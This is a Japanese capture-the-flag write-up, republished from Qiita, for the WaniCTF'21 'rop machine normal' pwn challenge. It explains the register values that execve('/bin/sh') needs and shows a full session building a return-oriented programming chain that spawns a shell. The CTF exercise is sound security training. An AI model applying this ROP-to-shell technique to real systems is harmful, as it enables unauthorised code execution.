WaniCTF'21-spring pwn 04 rop machine normal Writeup
WaniCTF'21-spring pwn 04 rop machine normal
問題
# ./pwn04
"/bin/sh" address is 0x404070
[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
# ./pwn04
"/bin/sh" address is 0x404070
[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
syscall があるので execve("/bin/sh",null,null) を狙えとのこと。
syscallに飛ばすときのレジスタの状態を知っているかどうかの知識問題
| レジスタ | 値 |
|---|---|
| RDI | "/bin/sh"のアドレス |
| RSI | 0x0 |
| RDX | 0x0 |
| RAX | 0x3b (59 execve) |
流れ
# ./pwn04
"/bin/sh" address is 0x404070
[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
> 2
"pop rdi; ret" is appended
> 1
hex value?: 404070
0x0000000000404070 is appended
> 3
"pop rsi; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 4
"pop rdx; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 5
"pop rax; ret" is appended
> 1
hex value?: 3b
0x000000000000003b is appended
> 6
"syscall; ret" is appended
> 9
rop_arena
+--------------------+
| pop rdi; ret |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret |
+--------------------+
> 0
rop_arena
+--------------------+
| pop rdi; ret |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret |
+--------------------+
# ls
peda-session-pwn02.txt pwn02 pwn02.c pwn02.py pwn03 pwn03.c pwn03.py pwn04 pwn04.c
Author And Source
この問題について(WaniCTF'21-spring pwn 04 rop machine normal Writeup), 我々は、より多くの情報をここで見つけました https://qiita.com/housu_jp/items/c558dcac8b5c5bd66d27著者帰属:元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。
Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .